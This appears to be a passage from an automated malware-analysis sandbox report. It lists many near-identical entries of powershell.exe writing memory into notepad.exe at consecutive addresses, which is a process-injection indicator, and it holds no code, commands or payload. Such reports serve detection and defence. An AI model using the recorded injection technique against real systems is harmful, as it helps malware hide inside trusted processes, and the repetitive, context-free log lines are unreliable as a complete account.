              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00F9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0100Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0101Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0102Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0103Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0104Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0105Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0106Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0107Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0108Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0109Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC010FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0110Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0111Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0112Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0113Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0114Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0115Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0116Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0117Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0118Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0119Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC011FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0120Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0121Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0122Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0123Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0126Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0127Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0128Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0129Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC012FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0130Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0131Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0132Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0133Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0134Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0135Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0136Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0137Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0138Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0139Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC013FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0140Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0141Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0142Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0143Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0144Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0145Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0146Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0147Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0148Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0149Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC014FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0150Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0151Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0152Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0153Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0154Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0155Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0156Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0157Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0158Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0159Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC015FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0160Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0161Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0162Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0163Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0164Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0165Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0166Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0167Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0168Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0169Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC016FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0170Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0171Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0172Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0173Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0174Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0175Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0176Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0177Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0178Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0179Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC017FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0180Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0181Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0182Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0183Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0184Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0185Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0186Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0187Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0188Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0189Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC018FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0190Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0191Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0192Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0193Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0194Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0195Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0196Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0197Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0198Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0199Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC019FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01BAJump to behavior
